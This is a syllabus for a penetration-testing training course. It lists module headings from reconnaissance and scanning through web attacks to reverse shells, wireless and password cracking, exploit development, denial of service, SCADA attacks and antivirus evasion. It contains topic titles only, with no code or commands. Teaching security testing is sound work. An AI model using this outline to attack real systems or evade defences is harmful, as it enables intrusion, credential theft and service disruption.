Real World

Penetration Testing
RWPT Online Syllabus
v.1.0
 Real World Penetration Testing course is an
investment in your own career. Give yourself
a competitive advantage over your
colleagues. Our course is the most up-to-date
in the industry!

Prerequisites
Real World Penetration Testing is an entry-level course but still requires students to
have certain knowledge prior to attending the class. A solid understanding of TCP/IP,
networking, and reasonable Linux skills are required. This course it requires practice,
testing, and the ability to want to learn in a manner that will grow your career in the
information security field.

Who Should Attend

 Penetration testers
 Ethical hackers
 Auditors who need to build deeper technical skills
 Security personnel whose job involves assessing target networks and systems
to find security vulnerabilities
 Security managers
 System Administrators
 Network Administrators

Training Areas
 Web Application Security
 Source Code Audit
 Security Awareness
 Application Security Testing
 Security management
 Security Policy Implementation
 SDLC Development
 Threat Modeling
 Table of Contents

Introduction

Module 1:

Information Intelligence

1.1 Information Intelligence

1.1.1 Organize your information during penetration testing

1.1.2 Google/Bing Hacking

1.1.3 Extracting metadata of public documents

1.1.4 Gathering e-mail accounts, user names, subdomains and hostnames

1.1.5 whois lookups, OS info, uptime info, web server info

1.1.6 Traceroute Target IP Addres

 Module 2:

Scanning and Enumerating

2.1 Scanning

2.1.1 TCP Port Scanning

2.1.2 TCP SYN Port Scanning

2.1.3 TCP ACK Firewall Scanning

2.1.4 TCP "XMas" Port Scanning

2.1.5 Finding live hosts

2.1.6 UDP sweeping and probing

2.1.7 SSL Scanning

2.2 Database Enumerating

2.2.1 MySQL server version enumeration

2.2.2 MSSQL server version enumeration

2.2.3 Postgres server version enumeration

2.2.4 ORACLE server version enumeration

2.3 DNS Enumerating

2.4 SNMP Enumerating

2.5 SMTP Enumerating

2.6 SSH, POP3 and telnet version enumeration

2.7 Microsoft NetBIOS Enumerating

 Module 3:

Advanced Fingerprinting

3.1 Advanced Fingerprinting

3.1.1 Advanced web server fingerprinting

3.1.2 Advanced MSSQL servers fingerprinting

3.1.3 Advanced Web Application fingerprinting

3.1.4 Advanced Web Application Firewall fingerprinting

3.1.5 Advanced DNS and HTTP Load Balancers fingerprinting

3.1.5 Advanced Intrusion Prevention System fingerprinting

3.1.7 Advanced OS fingerprinting

Module 4:

Vulnerability Assessment

4.1 Vulnerability Assessment

4.1.1 Vulnerability Assessment vs Penetration testing

4.2 Assessing vulnerabilities

4.2.1 Nessus

4.2.2 W3af
 Module 5:

Advanced Web Application Attacks

5.1 Advanced Cross Site Scripting attacks

5.1.1 From reflected XSS to reverse shell

5.1.2 From stored XSS to reverse shell

5.2 Advanced File handling attacks

5.2.1 from File Upload to reverse shell

5.2.2 from Remote File Inclusion to reverse shell

5.2.3 from Local File Inclusion to reverse shell

5.3 Advanced SQL Injection attacks

5.3.1 from SQL injection to reverse shell

5.3.2 from Blind SQL injection to reverse shell

5.4 Advanced Brute Force attacks

5.5 Advanced Cross-Site Request Forgery (CSRF) attacks

5.6 Advanced System Command injection attacks

 Module 6:

Advanced Network Attacks

6.1 Sniffing Network Passwords

6.1.1 Sniffing HTTP passwords

6.1.2 Sniffing ftp and telnet passwords

6.1.3 Sniffing MYSQL and VNC passwords

6.2 Advanced sniffing

6.2.1 Advanced SSL sniffing

6.2.2 Sniffing Facebook Cookies

6.2.3 Sniffing IM (Yahoo,Msn) chat

6.3 Advanced network Attacks

6.3.1 Attacking Windows Domain Controller and Own the Network

6.3.2 from Man in the Middle Attack to Full Network Compromise

 Module 7:

Wireless Attacking Techniques

7.1 Discovery

7.1.1 Windows Discovery

7.1.2 Linux Discovery

7.1.3 Mobile Discovery

7.2 Attacking 802.11 Wireless Networks

7.2.1 De-authenticating Users

7.2.2 Defeating Mac Filtering

7.2.3 Cracking WEP on Linux with a Client Attached

7.2.4 Cracking WEP on Linux without a Client Attached

7.2.5 Denial of Service Attack

7.3 Attacking WPA-Protected 802.11 Networks

7.3.1 Breaking Authentication: WPA-PSK

7.3.2 Obtaining the Four-Way Handshake

7.3.3 Cracking the Pre-Shared Key

7.3.4 Decrypting WPA-PSK Captures

 Module 8:

Windows Exploit Development

8.1 Introduction

8.1.1 Memory Corruption

8.1.2 Memory Corruption Classes

8.1.3 Vulnerability Analysis

8.1.4 Exploit Development

8.1.5 Debugger (Olly), Stack and Assembly all in one

8.2 Fuzzing

8.3 Exploiting Windows Buffer Overflows

8.3.1 Replicating the Crash

8.3.2 Controlling EIP

8.3.3 Locating Space for our Shellcode

8.3.4 Redirecting the execution flow

8.3.5 Finding a return address

8.3.6 Basic shellcode creation

8.3.7 from bind shell to reverse meterpreter shell

 Module 9:
Password Attacks

9.1 Online Password Attacks

9.1.1 FTP Bruteforce

9.1.2 POP3 Bruteforce

9.1.3 SNMP Bruteforce

9.1.4 VNC Bruteforce

9.1.5 MySQL Bruteforce

9.1.6 SMB Bruteforce

9.2 Password profiling

9.3 Offline Password Attacks

9.3.1 Hash Examples and how to crack MD5 hash

9.3.2 Cracking Linux/UNIX passwd and shadow files

9.3.3 Change/reset any account password from Windows 2000 to Windows 7

9.3.4 Retrieve Browser Passwords

9.3.5 Retrieve RDP passwords

9.3.6 Retrieve VNC passwords

9.3.7 Retrieve Instant Messaging passwords

9.3.8 Retrieve Facebook,Twitter,gmail,Hotmail and yahoo Passwords

9.3.9 Retrieve Wireless profile passwords

9.3.10 Cracking Windows SAM Database in Seconds

9.3.11 Why cracking the Hash When you can pass the hash!
 Module 10:

The Exploitation Show

10.1 Server side attacks

10.1.1 Attacking Linux server

 Scanning

 Attack scenario 1: Remote Exploitation

 Attack scenario 2: Web Application Exploitation

 Attack scenario 3: Brute Force Login

 Post Exploitation

 Privilege Escalation

10.1.2 Attacking windows server

 Scanning

 Attack scenario 1: Remote Exploitation

 Attack scenario 2: Brute Force RDP

 Post Exploitation

 Privilege Escalation

10.2 Client side attacks

10.2.1 Attacking windows 7 and bypassing DEP and ASLR

10.2.2 Attacking Ubuntu 10

10.2.3 Attacking mac os x 10.6.2 snow leopard

10.3 Attacking SCADA Systems

 Module 11:

Denial of Service Attacks

11.1 Attacking Apache web server

11.2 Attacking IIS web server

11.3 Attacking windows Domain Controller

 Module 12:

Advanced Bypassing and Evasion techniques

12.1 Advanced stateful packet inspection firewall Evasion and Bypassing

12.2 Advanced Antivirus Detection Evasion and Bypassing (100% FUD)

12.3 Advanced Intrusion Detection System (IDS) Evasion and Bypassing

12.4 Advanced Internal Network enumeration Against NIPS/HIPS

12.5 Advanced NO DHCP Evasion and Bypassing

12.6 Advanced DHCP MAC Address reservations Evasion and Bypassing

12.7 Advanced Firewall outbound/inbound rules and proxy Evasion and Bypassing

12.8 Advanced Windows User Access Control (UAC) Evasion and Bypassing